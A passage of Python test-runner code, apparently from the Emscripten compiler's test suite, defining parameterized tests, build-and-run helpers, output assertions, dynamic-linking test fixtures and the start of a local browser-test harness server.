'benchmark',
]
if shared.Settings.WASM_BACKEND:
non_core_test_modes += [
'asan',
'lsan',
'wasm2ss',
]
def parameterized(parameters):
"""
Mark a test as parameterized.
Usage:
@parameterized({
'subtest1': (1, 2, 3),
'subtest2': (4, 5, 6),
})
def test_something(self, a, b, c):
... # actual test body
This is equivalent to defining two tests:
def test_something_subtest1(self):
# runs test_something(1, 2, 3)
def test_something_subtest2(self):
# runs test_something(4, 5, 6)
"""
def decorator(func):
func._parameterize = parameters
return func
return decorator
class RunnerMeta(type):
@classmethod
def make_test(mcs, name, func, suffix, args):
"""
This is a helper function to create new test functions for each parameterized form.
:param name: the original name of the function
:param func: the original function that we are parameterizing
:param suffix: the suffix to append to the name of the function for this parameterization
:param args: the positional arguments to pass to the original function for this parameterization
:returns: a tuple of (new_function_name, new_function_object)
"""
# Create the new test function. It calls the original function with the specified args.
# We use @functools.wraps to copy over all the function attributes.
@wraps(func)
def resulting_test(self):
return func(self, *args)
# Add suffix to the function name so that it displays correctly.
resulting_test.__name__ = '%s_%s' % (name, suffix)
# On python 3, functions have __qualname__ as well. This is a full dot-separated path to the function.
# We add the suffix to it as well.
if hasattr(func, '__qualname__'):
resulting_test.__qualname__ = '%s_%s' % (func.__qualname__, suffix)
return resulting_test.__name__, resulting_test
def __new__(mcs, name, bases, attrs):
# This metaclass expands parameterized methods from `attrs` into separate ones in `new_attrs`.
new_attrs = {}
for attr_name, value in attrs.items():
# Check if a member of the new class has _parameterize, the tag inserted by @parameterized.
if hasattr(value, '_parameterize'):
# If it does, we extract the parameterization information, build new test functions.
for suffix, args in value._parameterize.items():
new_name, func = mcs.make_test(attr_name, value, suffix, args)
assert new_name not in new_attrs, 'Duplicate attribute name generated when parameterizing %s' % attr_name
new_attrs[new_name] = func
else:
# If not, we just copy it over to new_attrs verbatim.
assert attr_name not in new_attrs, '%s collided with an attribute from parameterization' % attr_name
new_attrs[attr_name] = value
# We invoke type, the default metaclass, to actually create the new class, with new_attrs.
return type.__new__(mcs, name, bases, new_attrs)
# This is a hack to make the metaclass work on both python 2 and python 3.
#
# On python 3, the code should be:
# class RunnerCore(unittest.TestCase, metaclass=RunnerMeta):
# ...
#
# On python 2, the code should be:
# class RunnerCore(unittest.TestCase):
# __metaclass__ = RunnerMeta
# ...
#
# To be compatible with both python 2 and python 3, we create a class by directly invoking the
# metaclass, which is done in the same way on both python 2 and 3, and inherit from it,
# since a class inherits the metaclass by default.
class RunnerCore(RunnerMeta('TestCase', (unittest.TestCase,), {})):
# default temporary directory settings. set_temp_dir may be called later to
# override these
temp_dir = TEMP_DIR
canonical_temp_dir = get_canonical_temp_dir(TEMP_DIR)
# Redirect compiler stderr so that compiler warnings etc. do not clutter the
# test runner output (which also goes to stderr).
# Change this to None to get stderr reporting, for debugging purposes
stderr_redirect = STDOUT
def is_emterpreter(self):
return self.get_setting('EMTERPRETIFY')
def is_wasm(self):
return self.get_setting('WASM') != 0
def is_wasm_backend(self):
return self.get_setting('WASM_BACKEND')
def check_dlfcn(self):
if self.get_setting('ALLOW_MEMORY_GROWTH') == 1 and not self.is_wasm():
self.skipTest('no dlfcn with memory growth (without wasm)')
if self.get_setting('WASM_BACKEND') and not self.get_setting('WASM'):
self.skipTest('no dynamic library support in wasm2js yet')
def uses_memory_init_file(self):
if self.get_setting('SIDE_MODULE') or \
(self.get_setting('WASM') and not self.get_setting('WASM2JS')):
return False
elif '--memory-init-file' in self.emcc_args:
return int(self.emcc_args[self.emcc_args.index('--memory-init-file') + 1])
else:
# side modules handle memory differently; binaryen puts the memory in the wasm module
opt_supports = any(opt in self.emcc_args for opt in ('-O2', '-O3', '-Os', '-Oz'))
return opt_supports
def set_temp_dir(self, temp_dir):
self.temp_dir = temp_dir
self.canonical_temp_dir = get_canonical_temp_dir(self.temp_dir)
# Explicitly set dedicated temporary directory for parallel tests
os.environ['EMCC_TEMP_DIR'] = self.temp_dir
@classmethod
def setUpClass(cls):
super(RunnerCore, cls).setUpClass()
print('(checking sanity from test runner)') # do this after we set env stuff
shared.check_sanity(force=True)
def setUp(self):
super(RunnerCore, self).setUp()
self.settings_mods = {}
self.emcc_args = ['-Werror']
self.save_dir = EMTEST_SAVE_DIR
self.env = {}
self.temp_files_before_run = []
if EMTEST_DETECT_TEMPFILE_LEAKS:
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, filename)))
self.banned_js_engines = []
self.use_all_engines = EMTEST_ALL_ENGINES
if self.save_dir:
self.working_dir = os.path.join(self.temp_dir, 'emscripten_test')
ensure_dir(self.working_dir)
else:
self.working_dir = tempfile.mkdtemp(prefix='emscripten_test_' + self.__class__.__name__ + '_', dir=self.temp_dir)
os.chdir(self.working_dir)
if not self.save_dir:
self.has_prev_ll = False
for temp_file in os.listdir(TEMP_DIR):
if temp_file.endswith('.ll'):
self.has_prev_ll = True
def tearDown(self):
if not self.save_dir:
# rmtree() fails on Windows if the current working directory is inside the tree.
os.chdir(os.path.dirname(self.get_dir()))
try_delete(self.get_dir())
if EMTEST_DETECT_TEMPFILE_LEAKS and not os.environ.get('EMCC_DEBUG'):
temp_files_after_run = []
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, filename)))
# Our leak detection will pick up *any* new temp files in the temp dir. They may not be due to
# us, but e.g. the browser when running browser tests. Until we figure out a proper solution,
# ignore some temp file names that we see on our CI infrastructure.
ignorable_file_prefixes = [
'/tmp/tmpaddon',
'/tmp/circleci-no-output-timeout',
'/tmp/wasmer'
]
left_over_files = set(temp_files_after_run) - set(self.temp_files_before_run)
left_over_files = [f for f in left_over_files if not any([f.startswith(prefix) for prefix in ignorable_file_prefixes])]
if len(left_over_files):
print('ERROR: After running test, there are ' + str(len(left_over_files)) + ' new temporary files/directories left behind:', file=sys.stderr)
for f in left_over_files:
print('leaked file: ' + f, file=sys.stderr)
self.fail('Test leaked ' + str(len(left_over_files)) + ' temporary files!')
# Make sure we don't leave stuff around
# if not self.has_prev_ll:
# for temp_file in os.listdir(TEMP_DIR):
# assert not temp_file.endswith('.ll'), temp_file
# # TODO assert not temp_file.startswith('emscripten_'), temp_file
def get_setting(self, key):
if key in self.settings_mods:
return self.settings_mods[key]
return Settings[key]
def set_setting(self, key, value=1):
if value is None:
self.clear_setting(key)
self.settings_mods[key] = value
def has_changed_setting(self, key):
return key in self.settings_mods
def clear_setting(self, key):
self.settings_mods.pop(key, None)
def serialize_settings(self):
ret = []
for key, value in self.settings_mods.items():
if value == 1:
ret += ['-s', key]
else:
ret += ['-s', '{}={}'.format(key, json.dumps(value))]
return ret
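# For example (illustrative values), settings_mods == {'WASM': 1,
# 'INITIAL_MEMORY': 33554432} serializes to
# ['-s', 'WASM', '-s', 'INITIAL_MEMORY=33554432'].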
def get_dir(self):
return self.working_dir
def in_dir(self, *pathelems):
return os.path.join(self.get_dir(), *pathelems)
def get_stdout_path(self):
return os.path.join(self.get_dir(), 'stdout')
def prep_ll_file(self, output_file, input_file, force_recompile=False, build_ll_hook=None):
# force_recompile = force_recompile or os.path.getsize(filename + '.ll') > 50000
# If the file is big, recompile just to get ll_opts
# Recompiling just for dfe in ll_opts is too costly
def fix_target(ll_filename):
if LLVM_TARGET == ASM_JS_TARGET:
return
with open(ll_filename) as f:
contents = f.read()
if LLVM_TARGET in contents:
return
asmjs_layout = "e-p:32:32-i64:64-v128:32:128-n32-S128"
wasm_layout = "e-m:e-p:32:32-i64:64-n32:64-S128"
assert(ASM_JS_TARGET in contents)
assert(asmjs_layout in contents)
contents = contents.replace(asmjs_layout, wasm_layout)
contents = contents.replace(ASM_JS_TARGET, WASM_TARGET)
with open(ll_filename, 'w') as f:
f.write(contents)
output_obj = output_file + '.o'
output_ll = output_file + '.ll'
if force_recompile or build_ll_hook:
if input_file.endswith(('.bc', '.o')):
if input_file != output_obj:
shutil.copy(input_file, output_obj)
Building.llvm_dis(output_obj, output_ll)
else:
shutil.copy(input_file, output_ll)
fix_target(output_ll)
if build_ll_hook:
need_post = build_ll_hook(output_file)
Building.llvm_as(output_ll, output_obj)
shutil.move(output_ll, output_ll + '.pre') # for comparisons later
Building.llvm_dis(output_obj, output_ll)
if build_ll_hook and need_post:
build_ll_hook(output_file)
Building.llvm_as(output_ll, output_obj)
shutil.move(output_ll, output_ll + '.post') # for comparisons later
Building.llvm_dis(output_obj, output_ll)
Building.llvm_as(output_ll, output_obj)
else:
if input_file.endswith('.ll'):
safe_copy(input_file, output_ll)
fix_target(output_ll)
Building.llvm_as(output_ll, output_obj)
else:
safe_copy(input_file, output_obj)
return output_obj
# returns the full list of arguments to pass to emcc
# param @main_file whether this is the main file of the test. some arguments
# (like --pre-js) do not need to be passed when building
# libraries, for example
def get_emcc_args(self, main_file=False):
args = self.serialize_settings() + self.emcc_args
if not main_file:
for i, arg in enumerate(args):
if arg in ('--pre-js', '--post-js'):
args[i] = None
args[i + 1] = None
args = [arg for arg in args if arg is not None]
return args
# Build JavaScript code from source code
def build(self, src, dirname, filename, main_file=None,
additional_files=[], libraries=[], includes=[], build_ll_hook=None,
post_build=None, js_outfile=True):
# Copy over necessary files for compiling the source
if main_file is None:
with open(filename, 'w') as f:
f.write(src)
final_additional_files = []
for f in additional_files:
final_additional_files.append(os.path.join(dirname, os.path.basename(f)))
shutil.copyfile(f, final_additional_files[-1])
additional_files = final_additional_files
else:
# copy whole directory, and use a specific main .cpp file
# (rmtree() fails on Windows if the current working directory is inside the tree.)
if os.getcwd().startswith(os.path.abspath(dirname)):
os.chdir(os.path.join(dirname, '..'))
shutil.rmtree(dirname)
shutil.copytree(src, dirname)
shutil.move(os.path.join(dirname, main_file), filename)
# the additional files were copied; alter additional_files to point to their full paths now
additional_files = [os.path.join(dirname, f) for f in additional_files]
os.chdir(self.get_dir())
suffix = '.o.js' if js_outfile else '.o.wasm'
if build_ll_hook:
# "slow", old path: build to bc, then build to JS
# C++ => LLVM binary
for f in [filename] + additional_files:
try:
# Make sure we notice if compilation steps failed
os.remove(f + '.o')
except OSError:
pass
args = [PYTHON, EMCC] + self.get_emcc_args(main_file=True) + \
['-I' + dirname, '-I' + os.path.join(dirname, 'include')] + \
['-I' + include for include in includes] + \
['-c', f, '-o', f + '.o']
run_process(args, stderr=self.stderr_redirect if not DEBUG else None)
self.assertExists(f + '.o')
# Link all files
object_file = filename + '.o'
if len(additional_files) + len(libraries):
shutil.move(object_file, object_file + '.alone')
inputs = [object_file + '.alone'] + [f + '.o' for f in additional_files] + libraries
Building.link_to_object(inputs, object_file)
if not os.path.exists(object_file):
print("Failed to link LLVM binaries:\n\n", object_file)
self.fail("Linkage error")
# Finalize
self.prep_ll_file(filename, object_file, build_ll_hook=build_ll_hook)
# BC => JS
Building.emcc(object_file, self.get_emcc_args(main_file=True), object_file + '.js')
else:
# "fast", new path: just call emcc and go straight to JS
all_files = [filename] + additional_files + libraries
for i in range(len(all_files)):
if '.' not in all_files[i]:
shutil.move(all_files[i], all_files[i] + '.bc')
all_files[i] += '.bc'
args = [PYTHON, EMCC] + self.get_emcc_args(main_file=True) + \
['-I' + dirname, '-I' + os.path.join(dirname, 'include')] + \
['-I' + include for include in includes] + \
all_files + ['-o', filename + suffix]
run_process(args, stderr=self.stderr_redirect if not DEBUG else None)
self.assertExists(filename + suffix)
if post_build:
post_build(filename + suffix)
if js_outfile and self.uses_memory_init_file():
src = open(filename + suffix).read()
# side memory init file, or an empty one in the js
assert ('/* memory initializer */' not in src) or ('/* memory initializer */ allocate([]' in src)
def validate_asmjs(self, err):
m = re.search(r"asm.js type error: '(\w+)' is not a (standard|supported) SIMD type", err)
if m:
# Bug numbers for missing SIMD types:
bugs = {
'Int8x16': 1136226,
'Int16x8': 1136226,
'Uint8x16': 1244117,
'Uint16x8': 1244117,
'Uint32x4': 1240796,
'Float64x2': 1124205,
}
simd = m.group(1)
if simd in bugs:
print(("\nWARNING: ignoring asm.js type error from {} due to implementation not yet available in SpiderMonkey." +
" See https://bugzilla.mozilla.org/show_bug.cgi?id={}\n").format(simd, bugs[simd]), file=sys.stderr)
err = err.replace(m.group(0), '')
# check for asm.js validation
if 'uccessfully compiled asm.js code' in err and 'asm.js link error' not in err:
print("[was asm.js'ified]", file=sys.stderr)
# check for an asm.js validation error, if we expect one
elif 'asm.js' in err and not self.is_wasm() and self.get_setting('ASM_JS') == 1:
self.fail("did NOT asm.js'ify: " + err)
err = '\n'.join([line for line in err.split('\n') if 'uccessfully compiled asm.js code' not in line])
return err
def get_func(self, src, name):
start = src.index('function ' + name + '(')
t = start
n = 0
while True:
if src[t] == '{':
n += 1
elif src[t] == '}':
n -= 1
if n == 0:
return src[start:t + 1]
t += 1
assert t < len(src)
def count_funcs(self, javascript_file):
num_funcs = 0
start_tok = "// EMSCRIPTEN_START_FUNCS"
end_tok = "// EMSCRIPTEN_END_FUNCS"
start_off = 0
end_off = 0
with open(javascript_file, 'rt') as f:
blob = "".join(f.readlines())
start_off = blob.find(start_tok) + len(start_tok)
end_off = blob.find(end_tok)
asm_chunk = blob[start_off:end_off]
num_funcs = asm_chunk.count('function ')
return num_funcs
def count_wasm_contents(self, wasm_binary, what):
out = run_process([os.path.join(Building.get_binaryen_bin(), 'wasm-opt'), wasm_binary, '--metrics'], stdout=PIPE).stdout
# output is something like
# [?] : 125
for line in out.splitlines():
if '[' + what + ']' in line:
ret = line.split(':')[1].strip()
return int(ret)
self.fail('Failed to find [%s] in wasm-opt output' % what)
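# Illustrative call: counting the functions reported by wasm-opt --metrics
# (assumes 'funcs' is one of the metric names printed by the tool):
#   num_funcs = self.count_wasm_contents('test.wasm', 'funcs')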
def get_wasm_text(self, wasm_binary):
return run_process([os.path.join(Building.get_binaryen_bin(), 'wasm-dis'), wasm_binary], stdout=PIPE).stdout
def is_exported_in_wasm(self, name, wasm):
wat = self.get_wasm_text(wasm)
return ('(export "%s"' % name) in wat
def run_generated_code(self, engine, filename, args=[], check_timeout=True, output_nicerizer=None, assert_returncode=0):
# use files, as PIPE can get too full and hang us
stdout = self.in_dir('stdout')
stderr = self.in_dir('stderr')
# Make sure that we produced proper line endings to the .js file we are about to run.
self.assertEqual(line_endings.check_line_endings(filename), 0)
error = None
if EMTEST_VERBOSE:
print("Running '%s' under '%s'" % (filename, engine))
try:
with chdir(self.get_dir()):
jsrun.run_js(filename, engine, args, check_timeout,
stdout=open(stdout, 'w'),
stderr=open(stderr, 'w'),
assert_returncode=assert_returncode)
except subprocess.CalledProcessError as e:
error = e
out = open(stdout, 'r').read()
err = open(stderr, 'r').read()
if engine == SPIDERMONKEY_ENGINE and self.get_setting('ASM_JS') == 1:
err = self.validate_asmjs(err)
if output_nicerizer:
ret = output_nicerizer(out, err)
else:
ret = out + err
if error or EMTEST_VERBOSE:
print('-- begin program output --')
print(ret, end='')
print('-- end program output --')
if error:
self.fail('JS subprocess failed (%s): %s. Output:\n%s' % (error.cmd, error.returncode, ret))
# We should pass all strict mode checks
self.assertNotContained('strict warning:', ret)
return ret
def assertExists(self, filename, msg=None):
if not msg:
msg = 'Expected file not found: ' + filename
self.assertTrue(os.path.exists(filename), msg)
def assertNotExists(self, filename, msg=None):
if not msg:
msg = 'Unexpected file exists: ' + filename
self.assertFalse(os.path.exists(filename), msg)
# Tests that the given two paths are identical, modulo path delimiters. E.g. "C:/foo" is equal to "C:\foo".
def assertPathsIdentical(self, path1, path2):
path1 = path1.replace('\\', '/')
path2 = path2.replace('\\', '/')
return self.assertIdentical(path1, path2)
# Tests that the given two multiline text content are identical, modulo line
# ending differences (\r\n on Windows, \n on Unix).
def assertTextDataIdentical(self, text1, text2, msg=None,
fromfile='expected', tofile='actual'):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertIdentical(text1, text2, msg, fromfile, tofile)
def assertIdentical(self, values, y, msg=None,
fromfile='expected', tofile='actual'):
if type(values) not in (list, tuple):
values = [values]
for x in values:
if x == y:
return # success
diff_lines = difflib.unified_diff(x.split('\n'), y.split('\n'),
fromfile=fromfile, tofile=tofile)
diff = ''.join([a.rstrip() + '\n' for a in diff_lines])
if EMTEST_VERBOSE:
print("Expected to have '%s' == '%s'" % limit_size(values[0]), limit_size(y))
fail_message = 'Unexpected difference:\n' + limit_size(diff)
if not EMTEST_VERBOSE:
fail_message += '\nFor full output run with EMTEST_VERBOSE=1.'
if msg:
fail_message += '\n' + msg
self.fail(fail_message)
def assertTextDataContained(self, text1, text2):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertContained(text1, text2)
def assertContained(self, values, string, additional_info=''):
if type(values) not in [list, tuple]:
values = [values]
values = list(map(asstr, values))
if callable(string):
string = string()
if not any(v in string for v in values):
diff = difflib.unified_diff(values[0].split('\n'), string.split('\n'), fromfile='expected', tofile='actual')
diff = ''.join(a.rstrip() + '\n' for a in diff)
self.fail("Expected to find '%s' in '%s', diff:\n\n%s\n%s" % (
limit_size(values[0]), limit_size(string), limit_size(diff),
additional_info
))
def assertNotContained(self, value, string):
if callable(value):
value = value() # lazy loading
if callable(string):
string = string()
if value in string:
self.fail("Expected to NOT find '%s' in '%s', diff:\n\n%s" % (
limit_size(value), limit_size(string),
limit_size(''.join([a.rstrip() + '\n' for a in difflib.unified_diff(value.split('\n'), string.split('\n'), fromfile='expected', tofile='actual')]))
))
def assertContainedIf(self, value, string, condition):
if condition:
self.assertContained(value, string)
else:
self.assertNotContained(value, string)
library_cache = {}
def get_build_dir(self):
ret = os.path.join(self.get_dir(), 'building')
ensure_dir(ret)
return ret
def get_library(self, name, generated_libs, configure=['sh', './configure'],
configure_args=[], make=['make'], make_args=None,
env_init={}, cache_name_extra='', native=False):
if make_args is None:
make_args = ['-j', str(multiprocessing.cpu_count())]
build_dir = self.get_build_dir()
output_dir = self.get_dir()
emcc_args = self.get_emcc_args()
hash_input = (str(emcc_args) + ' $ ' + str(env_init)).encode('utf-8')
cache_name = name + ','.join([opt for opt in emcc_args if len(opt) < 7]) + '_' + hashlib.md5(hash_input).hexdigest() + cache_name_extra
valid_chars = "_%s%s" % (string.ascii_letters, string.digits)
cache_name = ''.join([(c if c in valid_chars else '_') for c in cache_name])
if self.library_cache.get(cache_name):
print('<load %s from cache> ' % cache_name, file=sys.stderr)
generated_libs = []
for basename, contents in self.library_cache[cache_name]:
bc_file = os.path.join(build_dir, cache_name + '_' + basename)
with open(bc_file, 'wb') as f:
f.write(contents)
generated_libs.append(bc_file)
return generated_libs
print('<building and saving %s into cache> ' % cache_name, file=sys.stderr)
return build_library(name, build_dir, output_dir, generated_libs, configure,
configure_args, make, make_args, self.library_cache,
cache_name, env_init=env_init, native=native, cflags=self.get_emcc_args())
def clear(self):
for name in os.listdir(self.get_dir()):
try_delete(os.path.join(self.get_dir(), name))
if EMSCRIPTEN_TEMP_DIR:
for name in os.listdir(EMSCRIPTEN_TEMP_DIR):
try_delete(os.path.join(EMSCRIPTEN_TEMP_DIR, name))
# Shared test code between main suite and others
def expect_fail(self, cmd, **args):
"""Run a subprocess and assert that it returns non-zero.
Return the stderr of the subprocess.
"""
proc = run_process(cmd, check=False, stderr=PIPE, **args)
self.assertNotEqual(proc.returncode, 0, 'subprocess unexpectedly succeeded. stderr:\n' + proc.stderr)
# When we check for failure we expect a user-visible error, not a traceback.
# However, on windows a python traceback can happen randomly sometimes,
# due to "Access is denied" https://github.com/emscripten-core/emscripten/issues/718
if not WINDOWS or 'Access is denied' not in proc.stderr:
self.assertNotContained('Traceback', proc.stderr)
return proc.stderr
def setup_runtimelink_test(self):
create_test_file('header.h', r'''
struct point
{
int x, y;
};
''')
supp = r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point &p) {
printf("supp: %d,%d\n", p.x, p.y);
mainFunc(p.x + p.y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
'''
create_test_file('supp.cpp', supp)
main = r'''
#include <stdio.h>
#include "header.h"
extern void suppFunc(struct point &p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(p);
printf("main see: %d\nok.\n", suppInt);
#ifdef BROWSER
REPORT_RESULT(suppInt);
#endif
return 0;
}
'''
return (main, supp)
# exercise the dynamic linker.
#
# test that linking to shared library B, which is linked to A, loads A as well.
# main is also linked to C, which is also linked to A. A is loaded/initialized only once.
#
# B
# main < > A
# C
#
# this test is used by both test_core and test_browser.
# when run under a browser it exercises how the dynamic linker handles concurrency
# - because B and C are loaded in parallel.
def _test_dylink_dso_needed(self, do_run):
create_test_file('liba.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
static const char *afunc_prev;
EMSCRIPTEN_KEEPALIVE void afunc(const char *s);
void afunc(const char *s) {
printf("a: %s (prev: %s)\n", s, afunc_prev);
afunc_prev = s;
}
struct ainit {
ainit() {
puts("a: loaded");
}
};
static ainit _;
''')
create_test_file('libb.cpp', r'''
#include <emscripten.h>
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void bfunc();
void bfunc() {
afunc("b");
}
''')
create_test_file('libc.cpp', r'''
#include <emscripten.h>
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void cfunc();
void cfunc() {
afunc("c");
}
''')
# _test_dylink_dso_needed can be potentially called several times by a test.
# reset dylink-related options first.
self.clear_setting('MAIN_MODULE')
self.clear_setting('SIDE_MODULE')
self.clear_setting('RUNTIME_LINKED_LIBS')
# XXX in wasm each lib load currently takes 5MB; default INITIAL_MEMORY=16MB is thus not enough
self.set_setting('INITIAL_MEMORY', 32 * 1024 * 1024)
so = '.wasm' if self.is_wasm() else '.js'
def ccshared(src, linkto=[]):
cmdv = [PYTHON, EMCC, src, '-o', os.path.splitext(src)[0] + so] + self.get_emcc_args()
cmdv += ['-s', 'SIDE_MODULE=1', '-s', 'RUNTIME_LINKED_LIBS=' + str(linkto)]
run_process(cmdv)
ccshared('liba.cpp')
ccshared('libb.cpp', ['liba' + so])
ccshared('libc.cpp', ['liba' + so])
self.set_setting('MAIN_MODULE', 1)
self.set_setting('RUNTIME_LINKED_LIBS', ['libb' + so, 'libc' + so])
do_run(r'''
void bfunc();
void cfunc();
int _main() {
bfunc();
cfunc();
return 0;
}
''',
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
self.set_setting('RUNTIME_LINKED_LIBS', [])
self.emcc_args += ['--embed-file', '.@/']
do_run(r'''
#include <assert.h>
#include <dlfcn.h>
#include <stddef.h>
int _main() {
void *bdso, *cdso;
void (*bfunc)(), (*cfunc)();
// FIXME for RTLD_LOCAL, binding symbols to the loaded lib is not currently working
bdso = dlopen("libb%(so)s", RTLD_GLOBAL);
assert(bdso != NULL);
cdso = dlopen("libc%(so)s", RTLD_GLOBAL);
assert(cdso != NULL);
bfunc = (void (*)())dlsym(bdso, "_Z5bfuncv");
assert(bfunc != NULL);
cfunc = (void (*)())dlsym(cdso, "_Z5cfuncv");
assert(cfunc != NULL);
bfunc();
cfunc();
return 0;
}
''' % locals(),
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
def filtered_js_engines(self, js_engines=None):
if js_engines is None:
js_engines = shared.JS_ENGINES
for engine in js_engines:
assert type(engine) == list
for engine in self.banned_js_engines:
assert type(engine) in (list, type(None))
banned = [b[0] for b in self.banned_js_engines if b]
return [engine for engine in js_engines if engine and engine[0] not in banned]
def do_run_from_file(self, src, expected_output, *args, **kwargs):
if 'force_c' not in kwargs and os.path.splitext(src)[1] == '.c':
kwargs['force_c'] = True
logger.debug('do_run_from_file: %s' % src)
self.do_run(open(src).read(), open(expected_output).read(), *args, **kwargs)
## Does a complete test - builds, runs, checks output, etc.
def do_run(self, src, expected_output, args=[], output_nicerizer=None,
no_build=False, main_file=None, additional_files=[],
js_engines=None, post_build=None, basename='src.cpp', libraries=[],
includes=[], force_c=False, build_ll_hook=None,
assert_returncode=0, assert_identical=False, assert_all=False,
check_for_error=True):
if force_c or (main_file is not None and main_file[-2:] == '.c'):
basename = 'src.c'
Building.COMPILER = to_cc(Building.COMPILER)
if no_build:
if src:
js_file = src
else:
js_file = basename + '.o.js'
else:
dirname = self.get_dir()
filename = os.path.join(dirname, basename)
self.build(src, dirname, filename, main_file=main_file,
additional_files=additional_files, libraries=libraries,
includes=includes,
build_ll_hook=build_ll_hook, post_build=post_build)
js_file = filename + '.o.js'
self.assertExists(js_file)
# Run in both JavaScript engines, if optimizing - significant differences there (typed arrays)
js_engines = self.filtered_js_engines(js_engines)
# Make sure to get asm.js validation checks, using sm, even if not testing all vms.
if len(js_engines) > 1 and not self.use_all_engines:
if SPIDERMONKEY_ENGINE in js_engines and not self.is_wasm_backend():
js_engines = [SPIDERMONKEY_ENGINE]
else:
js_engines = js_engines[:1]
# In standalone mode, also add wasm vms as we should be able to run there too.
if self.get_setting('STANDALONE_WASM'):
# TODO once standalone wasm support is more stable, apply use_all_engines
# like with js engines, but for now as we bring it up, test in all of them
wasm_engines = shared.WASM_ENGINES
if len(wasm_engines) == 0:
logger.warning('no wasm engine was found to run the standalone part of this test')
js_engines += wasm_engines
if len(js_engines) == 0:
self.skipTest('No JS engine present to run this test with. Check %s and the paths therein.' % EM_CONFIG)
for engine in js_engines:
js_output = self.run_generated_code(engine, js_file, args, output_nicerizer=output_nicerizer, assert_returncode=assert_returncode)
js_output = js_output.replace('\r\n', '\n')
if expected_output:
try:
if assert_identical:
self.assertIdentical(expected_output, js_output)
elif assert_all:
for o in expected_output:
self.assertContained(o, js_output)
else:
self.assertContained(expected_output, js_output)
if check_for_error:
self.assertNotContained('ERROR', js_output)
except Exception:
print('(test did not pass in JS engine: %s)' % engine)
raise
def get_freetype_library(self):
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
return self.get_library(os.path.join('third_party', 'freetype'), os.path.join('objs', '.libs', 'libfreetype.a'), configure_args=['--disable-shared', '--without-zlib'])
def get_poppler_library(self, env_init=None):
# The fontconfig symbols are all missing from the poppler build
# e.g. FcConfigSubstitute
self.set_setting('ERROR_ON_UNDEFINED_SYMBOLS', 0)
self.emcc_args += [
'-I' + path_from_root('tests', 'third_party', 'freetype', 'include'),
'-I' + path_from_root('tests', 'third_party', 'poppler', 'include')
]
freetype = self.get_freetype_library()
# Poppler has some pretty glaring warnings. Suppress them to keep the
# test output readable.
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
self.emcc_args += [
'-Wno-sentinel',
'-Wno-logical-not-parentheses',
'-Wno-unused-private-field',
'-Wno-tautological-compare',
'-Wno-unknown-pragmas',
]
env_init = env_init.copy() if env_init else {}
env_init['FONTCONFIG_CFLAGS'] = ' '
env_init['FONTCONFIG_LIBS'] = ' '
poppler = self.get_library(
os.path.join('third_party', 'poppler'),
[os.path.join('utils', 'pdftoppm.o'), os.path.join('utils', 'parseargs.o'), os.path.join('poppler', '.libs', 'libpoppler.a')],
env_init=env_init,
configure_args=['--disable-libjpeg', '--disable-libpng', '--disable-poppler-qt', '--disable-poppler-qt4', '--disable-cms', '--disable-cairo-output', '--disable-abiword-output', '--disable-shared'])
return poppler + freetype
def get_zlib_library(self):
if WINDOWS:
return self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'),
configure=[path_from_root('emconfigure.bat')],
configure_args=['cmake', '.'],
make=['mingw32-make'],
make_args=[])
return self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'), make_args=['libz.a'])
# Run a server and a web page. When a test runs, we tell the server about it,
# which tells the web page, which then opens a window with the test. Doing
# it this way then allows the page to close() itself when done.
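# Roughly, as implemented below: the browser first loads /run_harness, then
# polls /check until a test URL is queued on in_queue; the test page reports
# its result via a 'report_...' request, whose path is handed back to the
# waiting python test through out_queue.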
def harness_server_func(in_queue, out_queue, port):
class TestServerHandler(SimpleHTTPRequestHandler):
# Request header handler for default do_GET() path in
# SimpleHTTPRequestHandler.do_GET(self) below.
def send_head(self):
if self.path.endswith('.js'):
path = self.translate_path(self.path)
try:
f = open(path, 'rb')
except IOError:
self.send_error(404, "File not found: " + path)
return None
self.send_response(200)
self.send_header('Content-type', 'application/javascript')
self.send_header('Connection', 'close')
self.end_headers()
return f
else:
return SimpleHTTPRequestHandler.send_head(self)
# Add COOP, COEP, CORP, and no-caching headers
def end_headers(self):
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Cross-Origin-Opener-Policy', 'same-origin')
self.send_header('Cross-Origin-Embedder-Policy', 'require-corp')
self.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
self.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
return SimpleHTTPRequestHandler.end_headers(self)
def do_GET(self):
if self.path == '/run_harness':
if DEBUG:
print('[server startup]')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(open(path_from_root('tests', 'browser_harness.html'), 'rb').read())
elif 'report_' in self.path:
# the test is reporting its result. first change dir away from the
# test dir, as it will be deleted now that the test is finishing, and
# if we got a ping at that time, we'd return an error
os.chdir(path_from_root())
# for debugging, tests may encode the result and their own url (window.location) as result|url
if '|' in self.path:
path, url = self.path.split('|', 1)
else:
path = self.path
url = '?'
if DEBUG:
print('[server response:', path, url, ']')
if out_queue.empty():
out_queue.put(path)
else:
# a badly-behaving test may send multiple xhrs with reported results; we just care
# about the first (if we queued the others, they might be read as responses for
# later tests, or maybe the test sends more than one in a racy manner).
# we place 'None' in the queue here so that the outside knows something went wrong
